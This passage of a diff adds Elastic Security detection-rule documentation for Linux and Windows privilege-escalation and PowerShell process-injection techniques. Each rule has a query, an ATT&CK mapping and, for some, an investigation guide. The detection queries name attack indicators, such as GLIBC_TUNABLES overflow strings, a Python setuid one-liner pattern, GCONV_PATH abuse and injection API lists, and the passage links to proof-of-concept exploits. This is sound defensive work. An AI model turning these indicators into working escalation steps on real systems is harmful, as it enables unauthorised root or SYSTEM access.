https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Escape to Host +** ID: T1611 +** Reference URL: https://attack.mitre.org/techniques/T1611/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc new file mode 100644 index 0000000000..586548d527 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration]] +=== Potential Privilege Escalation via Container Misconfiguration + +This rule monitors for the execution of processes that interact with Linux containers through an interactive shell without root permissions. Utilities such as runc and ctr are universal command-line utilities leveraged to interact with containers via root permissions. On systems where the access to these utilities are misconfigured, attackers might be able to create and run a container that mounts the root folder or spawn a privileged container vulnerable to a container escape attack, which might allow them to escalate privileges and gain further access onto the host file system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation +* https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Domain: Container +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name == "runc" and process.args == "run") or + (process.name == "ctr" and process.args == "run" and process.args in ("--privileged", "--mount")) +) and not user.Ext.real.id == "0" and not group.Ext.real.id == "0" and +process.interactive == true and process.parent.interactive == true + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Escape to Host +** ID: T1611 +** Reference URL: https://attack.mitre.org/techniques/T1611/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc new file mode 100644 index 0000000000..9daff4a7a1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc @@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911]] +=== Potential Privilege Escalation via CVE-2023-4911 + +This rule detects potential privilege escalation attempts through Looney Tunables (CVE-2023-4911). Looney Tunables is a buffer overflow vulnerability in GNU C Library's dynamic loader's processing of the GLIBC_TUNABLES environment variable. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id, process.executable with maxspan=5s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.env_vars : "*GLIBC_TUNABLES=glibc.*=glibc.*=*"] with runs=5 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc new file mode 100644 index 0000000000..1bb7cbeb6f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc @@ -0,0 +1,140 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover]] +=== Potential Privilege Escalation via InstallerFileTakeOver + +Identifies a potential exploitation of InstallerTakeOver (CVE-2021-41379) default PoC execution. Successful exploitation allows an unprivileged user to escalate privileges to SYSTEM. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/klinix5/InstallerFileTakeOver + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Privilege Escalation via InstallerFileTakeOver + +InstallerFileTakeOver is a weaponized escalation of privilege proof of concept (EoP PoC) to the CVE-2021-41379 vulnerability. Upon successful exploitation, an unprivileged user will escalate privileges to SYSTEM/NT AUTHORITY. + +This rule detects the default execution of the PoC, which overwrites the `elevation_service.exe` DACL and copies itself to the location to escalate privileges. An attacker is able to still take over any file that is not in use (locked), which is outside the scope of this rule. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Look for additional processes spawned by the process, command lines, and network communications. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- Verify whether a digital signature exists in the executable, and if it is valid. + +### Related rules + +- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.Ext.token.integrity_level_name : "System" and + ( + (process.name : "elevation_service.exe" and + not process.pe.original_file_name == "elevation_service.exe") or + + (process.name : "elevation_service.exe" and + not process.code_signature.trusted == true) or + + (process.parent.name : "elevation_service.exe" and + process.name : ("rundll32.exe", "cmd.exe", "powershell.exe")) + ) and + not + ( + process.name : "elevation_service.exe" and process.code_signature.trusted == true and + process.pe.original_file_name == null + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc new file mode 100644 index 0000000000..64d8e0e528 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs]] +=== Potential Privilege Escalation via OverlayFS + +Identifies an attempt to exploit a local privilege escalation (CVE-2023-2640 and CVE-2023-32629) via a flaw in Ubuntu's modifications to OverlayFS. These flaws allow the creation of specialized executables, which, upon execution, grant the ability to escalate privileges to root on the affected machine. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability +* https://twitter.com/liadeliyahu/status/1684841527959273472 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.parent.entity_id, host.id with maxspan=5s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name == "unshare" and process.args : ("-r", "-rm", "m") and process.args : "*cap_setuid*" and user.id != "0"] + [process where host.os.type == "linux" and event.action == "uid_change" and event.type == "change" and + user.id == "0"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc new file mode 100644 index 0000000000..8d156dd795 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc @@ -0,0 +1,77 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec]] +=== Potential Privilege Escalation via PKEXEC + +Identifies an attempt to exploit a local privilege escalation in polkit pkexec (CVE-2021-4034) via unsecure environment variable injection. Successful exploitation allows an unprivileged user to escalate to the root user. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://seclists.org/oss-sec/2022/q1/80 +* https://haxx.in/files/blasty-vs-pkexec.c + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Path Interception by PATH Environment Variable +** ID: T1574.007 +** Reference URL: https://attack.mitre.org/techniques/T1574/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc new file mode 100644 index 0000000000..65bf554013 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc @@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid]] +=== Potential Privilege Escalation via Python cap_setuid + +This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan=1s + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.args : "import os;os.set?id(0);os.system(*)" and process.args : "*python*" and user.id != "0"] + [process where host.os.type == "linux" and event.action in ("uid_change", "gid_change") and event.type == "change" and + (user.id == "0" or group.id == "0")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ +* Sub-technique: +** Name: Setuid and Setgid +** ID: T1548.001 +** Reference URL: https://attack.mitre.org/techniques/T1548/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc new file mode 100644 index 0000000000..1cdfc3827f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable]] +=== Potential Privilege Escalation via Recently Compiled Executable + +This rule monitors a sequence involving a program compilation event followed by its execution and a subsequent alteration of UID permissions to root privileges. This behavior can potentially indicate the execution of a kernel or software privilege escalation exploit. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + process.name in ("gcc", "g++", "cc") and user.id != "0"] by process.args + [file where host.os.type == "linux" and event.action == "creation" and event.type == "creation" and + process.name == "ld" and user.id != "0"] by file.name + [process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and + user.id != "0"] by process.name + [process where host.os.type == "linux" and event.action in ("uid_change", "guid_change") and event.type == "change" and + user.id == "0"] by process.name + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc new file mode 100644 index 0000000000..6334c75823 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc @@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected]] +=== Potential Privilege Escalation via UID INT_MAX Bug Detected + +This rule monitors for the execution of the systemd-run command by a user with a UID that is larger than the maximum allowed UID size (INT_MAX). Some older Linux versions were affected by a bug which allows user accounts with a UID greater than INT_MAX to escalate privileges by spawning a shell through systemd-run. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/paragonsec/status/1071152249529884674 +* https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh +* https://gitlab.freedesktop.org/polkit/polkit/-/issues/74 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and +process.name == "systemd-run" and process.args == "-t" and process.args_count >= 3 and user.id >= "1000000000" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc new file mode 100644 index 0000000000..4ee1ee43de --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc @@ -0,0 +1,96 @@ +[[prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing]] +=== Potential Privileged Escalation via SamAccountName Spoofing + +Identifies a suspicious computer account name rename event, which may indicate an attempt to exploit CVE-2021-42278 to elevate privileges from a standard domain user to a user with domain admin privileges. CVE-2021-42278 is a security vulnerability that allows potential attackers to impersonate a domain controller via samAccountName attribute spoofing. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e +* https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/ +* https://github.com/cube0x0/noPac +* https://twitter.com/exploitph/status/1469157138928914432 +* https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring +* Data Source: Active Directory +* Use Case: Vulnerability + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +iam where event.action == "renamed-user-account" and + /* machine account name renamed to user like account name */ + winlog.event_data.OldTargetUserName : "*$" and not winlog.event_data.NewTargetUserName : "*$" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc new file mode 100644 index 0000000000..e277678242 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc @@ -0,0 +1,143 @@ +[[prebuilt-rule-8-10-5-potential-process-injection-via-powershell]] +=== Potential Process Injection via PowerShell + +Detects the use of Windows API functions that are commonly abused by malware and security tools to load malicious code or inject it into remote processes. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1 +* https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1 +* https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1 +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: PowerShell Logs + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Process Injection via PowerShell + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +PowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way, like the execution of inline C# code, PSReflect, Get-ProcAddress, etc. + +Red Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject payloads directly into the memory without touching the disk to circumvent file-based security protections. + +#### Possible investigation steps + +- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine file or network events from the involved PowerShell process for suspicious behavior. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Check if the imported function was executed and which process it targeted. +- Check if the injected code can be retrieved (hardcoded in the script or on command line logs). + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Related rules + +- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and + powershell.file.script_block_text : ( + (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or + LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and + (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or + SuspendThread or ResumeThread or GetDelegateForFunctionPointer) + ) and not + (user.id:("S-1-5-18" or "S-1-5-19") and + file.directory: "C:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Process Injection +** ID: T1055 +** Reference URL: https://attack.mitre.org/techniques/T1055/ +* Sub-technique: +** Name: Dynamic-link Library Injection +** ID: T1055.001 +** Reference URL: https://attack.mitre.org/techniques/T1055/001/ +* Sub-technique: +** Name: Portable Executable Injection +** ID: T1055.002 +** Reference URL: https://attack.mitre.org/techniques/T1055/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: 